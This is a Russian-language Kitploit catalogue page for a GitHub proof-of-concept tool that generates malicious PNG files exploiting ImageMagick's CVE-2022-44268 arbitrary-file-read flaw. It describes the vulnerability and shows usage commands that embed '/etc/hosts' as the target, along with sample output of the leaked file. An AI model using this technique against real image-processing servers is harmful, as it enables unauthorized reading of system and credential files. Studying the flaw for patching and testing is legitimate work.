Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2022-44268 — Генерирует вредоносные PNG-файлы для эксплуатации уязвимости LFI в ImageMagick (CVE-2022-44268) для чтения произвольных файлов, со скриптом извлечения для доказательства концепции. | Kitploit
Инструменты/GitHubGitHub/pog-frog/cve-2022-44268
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеRed Teaming
GitHubpog-frog/cve-2022-44268

cve-2022-44268

Генерирует вредоносные PNG-файлы для эксплуатации уязвимости LFI в ImageMagick (CVE-2022-44268) для чтения произвольных файлов, со скриптом извлечения для доказательства концепции.

Репозиторий
123 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-44268

ImageMagick — это бесплатный кроссплатформенный программный пакет с открытым исходным кодом для отображения, преобразования и редактирования растровых и векторных изображений. Он поддерживает чтение и запись более 200 форматов изображений. ImageMagick распространяется под лицензией Apache License 2.0. Доступен в виде инструментов командной строки, а также C API и набора C++ классов. Wikipedia

Версии ImageMagick 7.1.0-40 и ниже уязвимы для Local File Inclusion (включение локальных файлов). Уязвимость вызвана некорректной проверкой пользовательского ввода. Злоумышленник может использовать эту уязвимость, отправив специально сформированный PNG-файл цели. Успешная эксплуатация может позволить злоумышленнику читать произвольные файлы в целевой системе.

Благодарность исследователям, обнаружившим это:

  • Bryan Gonzalez and the Ocelot Team

Создание вредоносного PNG для использования уязвимости в ImageMagick 7.1.0-40:

  • CVE-2022-44267: Отказ в обслуживании
  • CVE-2022-44268: Раскрытие информации

Требования

  • Python3
  • PIL (pip install Pillow)

Использование

Создание PNG с помощью generate.py:

root@kitploit:~
python3  generate.py -i input.png -f "/etc/hosts" -o exploit.png

     
  ______     __  _____                   ______                
 |  _ \ \   / / |  __ \                 |  ____|               
 | |_) \ \_/ /  | |__) |__   __ _ ______| |__ _ __ ___   __ _  
 |  _ < \   /   |  ___/ _ \ / _` |______|  __| '__/ _ \ / _` | 
 | |_) | | |    | |  | (_) | (_| |      | |  | | | (_) | (_| | 
 |____/  |_|    |_|   \___/ \__, |      |_|  |_|  \___/ \__, | 
                             __/ |                       __/ | 
                            |___/                       |___/  

    

   [*] ImageMagick LFI Exploit
   [*] Embedding Payload to read the target file
   [*] Exploit PNG generated: exploit.png

PoC

root@kitploit:~
python3 extract.py downloaded_img.png
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Отказ от ответственности: Будьте хорошим, пожалуйста, не используйте это для плохих целей

Скачать инструмент